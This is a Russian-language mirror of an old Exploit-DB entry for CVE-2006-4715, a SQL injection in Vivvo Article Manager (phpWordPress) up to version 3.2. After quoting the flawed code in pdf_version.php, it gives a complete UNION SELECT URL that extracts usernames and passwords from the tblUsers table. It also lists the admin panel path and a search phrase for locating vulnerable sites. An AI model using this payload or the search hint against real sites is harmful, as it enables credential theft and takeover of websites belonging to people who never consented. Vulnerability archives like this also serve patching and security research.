- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2337
- Проверка EDB
-
- Пройдено
- Автор
- MERCILESSTURK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4715
- Дата публикации
- 2006-09-09
Код:
############################################################
#MercilessTurk [email protected]
############################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
############################################################
#Vulnerable Code in pdf_version.php :
#line 19: $aid=secure_sql($_GET['id']);
#line 20: $query="SELECT * from tblArticles where id=$aid";
#secure_sql function doesn't block all sql injection attacks.
############################################################
#You will need a pdf reader.
#SQL Injection String:
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=[target_user_id]
############################################################
#Admin Panel:http://[target]/[path]/admin
############################################################
#For google searching:Vivvo Article Manager
############################################################
#Greetz: sanaldarbe.com members.
############################################################
# milw0rm.com [2006-09-09]
- Источник
- www.exploit-db.com